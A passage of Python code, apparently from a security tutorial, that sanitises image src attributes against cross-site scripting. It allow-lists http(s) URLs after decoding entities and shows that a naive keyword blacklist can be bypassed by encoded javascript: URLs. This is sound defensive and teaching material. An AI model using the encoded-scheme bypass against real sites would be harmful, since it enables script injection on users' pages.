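    browsers ignore inside a URL scheme."""
    decoded = html.unescape(value)
    return re.sub(r"[\x00-\x20\x7f]", "", decoded)


ALLOWED_SCHEMES = ("http://", "https://")


def safe_src(value):
    """Allow-list check for an attribute such as <img src=...>: only absolute
    http(s) URLs survive, everything else (javascript:, vbscript:, data:,
    any encoded spelling of them) is replaced by an empty value."""
    cleaned = _normalise(value).strip()
    if cleaned.lower().startswith(ALLOWED_SCHEMES):
        return html.escape(cleaned, quote=True)
    return ""


def escape_text(value):
    """Context-correct handling for untrusted text placed in HTML body content:
    the markup characters are encoded, so a pasted <IMG ...> tag renders as
    literal text instead of being parsed."""
    return html.escape(value, quote=True)


def render_img(value):
    return '<img src="%s">' % safe_src(value)


def still_dangerous_after_naive_filter(value):
    """True when the blacklist let an encoded javascript: URL through, i.e.
    the browser-decoded form still starts with the scheme the filter tried
    to remove."""
    return _normalise(naive_keyword_filter(value)).lower().startswith("javascript:")


if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample), "naive filter bypassed:",
              still_dangerous_after_naive_filter(sample), "->", render_img(sample))
```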